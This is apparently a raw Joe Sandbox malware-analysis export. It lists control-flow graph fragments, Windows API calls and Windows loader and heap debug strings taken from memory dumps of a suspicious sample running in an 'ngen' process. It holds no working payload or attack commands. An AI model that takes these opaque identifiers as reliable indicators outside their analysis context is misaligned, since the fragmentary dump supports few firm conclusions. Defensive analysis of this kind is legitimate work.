                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 30 4139b3-4139c5 31 4139cd-413a1d call 42d7c3 call 417363 call 404963 call 424183 30->31 32 4139c8 call 42cdb3 30->32 41 413a3d-413a43 31->41 42 413a1f-413a2e PostThreadMessageW 31->42 32->31 42->41 43 413a30-413a3a 42->43 43->41
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(5HG1921,00000111,00000000,00000000), ref: 00413A2A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 5HG1921$5HG1921
                                                                                                                      • API String ID: 1836367815-1110840446

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 161 417414-417417 162 417419-41741f 161->162 163 41739b-4173a0 161->163 164 4173b0-4173c1 call 42c3d3 163->164 165 4173a2-4173ad call 42e1d3 163->165 170 4173c3-4173d7 LdrLoadDll 164->170 171 4173da-4173dd 164->171 165->164 170->171
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004173D5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 172 42b173-42b1b1 call 4049f3 call 42bf13 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041DB6B,?,?,00000000,?,0041DB6B,?,?,?), ref: 0042B1AC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 177 42b1b3-42b1f1 call 4049f3 call 42bf13 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5057E845,00000007,00000000,00000004,00000000,00416C46,000000F4,?,?,?,?,?), ref: 0042B1EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 187 42b1f3-42b22c call 4049f3 call 42bf13 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,?,?,8F52686D,?,?,8F52686D), ref: 0042B227
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_ngen.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 192 5772c0a-5772c0f 193 5772c11-5772c18 192->193 194 5772c1f-5772c26 LdrInitializeThunk 192->194
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      Strings
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A54CE
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A540A, 057A5496, 057A5519
                                                                                                                      • undeleted critical section in freed memory, xrefs: 057A542B
                                                                                                                      • double initialized or corrupted critical section, xrefs: 057A5508
                                                                                                                      • Thread identifier, xrefs: 057A553A
                                                                                                                      • Address of the debug info found in the active list., xrefs: 057A54AE, 057A54FA
                                                                                                                      • 8, xrefs: 057A52E3
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057A54E2
                                                                                                                      • corrupted critical section, xrefs: 057A54C2
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 057A5543
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 057A54B6
                                                                                                                      • Critical section debug info address, xrefs: 057A541F, 057A552E
                                                                                                                      • Critical section address, xrefs: 057A5425, 057A54BC, 057A5534
                                                                                                                      • Critical section address., xrefs: 057A5502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0572D0FD
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0572D0CF
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0572D196
                                                                                                                      • @, xrefs: 0572D313
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0572D146
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0572D262
                                                                                                                      • @, xrefs: 0572D2AF
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0572D2C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 05726496
                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 057899ED
                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05789A2A
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05789A11, 05789A3A
                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05789A01
                                                                                                                      • LdrpInitShimEngine, xrefs: 057899F4, 05789A07, 05789A30
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      Strings
                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 057A219F
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 057A21BF
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 057A2178
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 057A2165
                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 057A2160, 057A219A, 057A21BA
                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 057A2180
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeProcess, xrefs: 0576C6C4
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 057A8181, 057A81F5
                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 057A8177, 057A81EB
                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 057A81E5
                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 057A8170
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0576C6C3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                      Strings
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 057A02BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A031E
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 057A02E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      Strings
                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 05755352
                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 05755247
                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 0575542B
                                                                                                                      • WindowsExcludedProcs, xrefs: 0575522A
                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 0575527B
                                                                                                                      Similarity
                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                      Similarity
                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                      Similarity
                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                      Similarity
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      Similarity
                                                                                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 05768591
                                                                                                                      • LdrpInitializeProcess, xrefs: 05768422
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05768421
                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0576855E
                                                                                                                      Similarity
                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 057A21DE
                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 057A22B6
                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 057A21D9, 057A22B1
                                                                                                                      • .Local, xrefs: 057628D8
                                                                                                                      Similarity
                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 057910AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0579106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05791028
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05790FE5
                                                                                                                      Similarity
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      Similarity
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                      Similarity
                                                                                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 05752462
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0579A992
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0579A9A2
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0579A998
                                                                                                                      Similarity
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      Similarity
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $ $0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 05731596
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05731728
                                                                                                                      • HEAP[%wZ]: , xrefs: 05731712
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      Strings
                                                                                                                      • TargetNtPath, xrefs: 0580B82F
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0580B82A
                                                                                                                      • GlobalizationUserSettings, xrefs: 0580B834
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      Strings
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0578E6C6
                                                                                                                      • HEAP: , xrefs: 0578E6B3
                                                                                                                      • HEAP[%wZ]: , xrefs: 0578E6A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      Strings
                                                                                                                      • LdrpCompleteMapModule, xrefs: 0579A590
                                                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0579A589
                                                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 0579A59A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                      Strings
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 057A82DE
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 057A82D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 057A82E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                      • API String ID: 0-1151232445
                                                                                                                      Strings
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 057A1B4A
                                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 057A1B39
                                                                                                                      • LdrpAllocateTls, xrefs: 057A1B40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                      • API String ID: 0-4274184382
                                                                                                                      Strings
                                                                                                                      • PreferredUILanguages, xrefs: 057EC212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 057EC1C5
                                                                                                                      • @, xrefs: 057EC1F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      Strings
                                                                                                                      • LdrpCheckRedirection, xrefs: 057B488F
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 057B4888
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 057B4899
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
